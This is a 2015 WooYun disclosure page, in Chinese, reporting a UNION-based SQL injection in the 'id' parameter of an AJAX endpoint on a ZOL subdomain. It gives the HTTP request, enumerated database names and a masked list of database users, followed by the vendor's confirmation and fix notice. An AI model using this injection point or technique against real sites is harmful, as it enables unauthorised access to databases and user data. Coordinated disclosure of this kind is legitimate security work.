当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099401

漏洞标题:中关村在线某站union注入大量数据库用户

相关厂商:中关村在线

漏洞作者: Forever80s

提交时间:2015-03-04 12:01

修复时间:2015-03-05 14:33

公开时间:2015-03-05 14:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-04: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

我欣赏中关村这个厂商,乌云有你更精彩~

详细说明:

网站:zb.zol.com.cn
参数id注入支持union

GET /ajax/get_subcat_data.php?_=1425426584209&type=1&id=54 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Host: zb.zol.com.cn
Accept-Encoding: gzip, deflate


poc:

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] zoldb


大量数据库用户

mask 区域
*****nagement sys*****
*****;@'10.*****
*****#039;@'1*****
*****#039;@'1*****
*****'@'*****
*****;@'10.*****
*****@'10.1*****
*****9;@'10*****
*****39;@'10*****
*****039;@'1*****
*****39;@'10*****
*****@'10.1*****
*****39;@'10*****
*****;@'10.*****
*****'10.1*****
*****;@'10*****
*****;@'10.*****
*****39;@'10*****
*****@'10.1*****
*****39;@'1*****
*****9;@'10*****
*****9;@'10*****
*****9;@'10.*****
*****9;@'10*****
*****9;@'10*****
*****@'10.*****
*****;@'10*****
*****;@'10*****
*****@'10.*****
*****#039;@'*****
*****9;@'10.*****
*****39;@'1*****
*****39;@'1*****
*****039;@'1*****
*****'@'*****
*****#039;@'*****
*****@'10.1*****
*****;@'10.*****
*****;@'10*****
*****;@'10.*****
*****;@'10.*****
*****;@'10.*****
*****39;@'10*****
*****'@'*****
*****39;@'1*****
*****039;@'1*****
*****39;@'1*****
*****9;@'10*****
*****39;@'1*****
*****9;@'10.*****
*****039;@'1*****
*****#039;@'*****
*****'@'*****
*****;@'10*****
*****;@'10.*****
*****39;@'10*****
*****39;@'1*****
*****39;@'10*****
*****;@'10.*****
*****9;@'10*****
*****;@'10.*****
*****;@'10*****
*****@'10.1*****
*****@'10.1*****
*****@'10.1*****
*****@'10.1*****
*****9;@'10*****
*****;@'10.*****
*****39;@'1*****
*****39;@'1*****
*****;@'10*****
*****39;@'1*****
*****@'10.1*****
*****'10.1*****
*****@'10.1*****
*****@'10.1*****
*****9;@'10*****
*****;@'10.*****
*****@'10.1*****
*****'10.1*****
*****;@'10*****
*****;@'10*****
*****9;@'10*****
*****9;@'10.*****
*****39;@'10*****
*****9;@'10*****
*****9;@'10*****
*****.15.185.0\\/255*****
*****;@'10*****
*****;@'12*****
*****;@'lo*****
*****;@'10*****
*****;@'10.*****
*****9;@'10*****
*****9;@'10.*****
*****@'10.1*****
*****9;@'10*****
*****;@'10.*****
*****;@'10.*****
*****;@'10*****
*****9;@'10*****
*****@'10.1*****
*****9;@'10*****
*****39;@'1*****
*****@'10.*****
*****39;@'10*****
*****9;@'10*****
*****@'10.1*****
*****9;@'10*****
*****;@'10.*****
*****#039;@'*****
*****039;@'1*****
*****#039;@'*****
*****@'10.1*****
*****9;@'10.*****
*****9;@'10*****
*****'10.1*****
*****cod*****


未来捍卫中关村的安全,数据库密码就不爆了,呵呵
基本包括所有系统了,全线产品。

漏洞证明:

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-03-04 13:35

厂商回复:

已反馈漏洞,会尽快修复~~

最新状态:

2015-03-05:已修复,感谢“Forever80s”


漏洞评价:

评论

  1. 2015-03-05 16:22 | 左手有枪 ( 实习白帽子 | Rank:31 漏洞数:4 )

    只给二哥6rank,惹怒二哥了,一下挖了中关村那么多洞

  2. 2015-03-08 14:20 | evil_webshell ( 路人 | Rank:0 漏洞数:2 | 致力于web层面的安全,热爱黑客技术,正在...)

    呵呵,确实是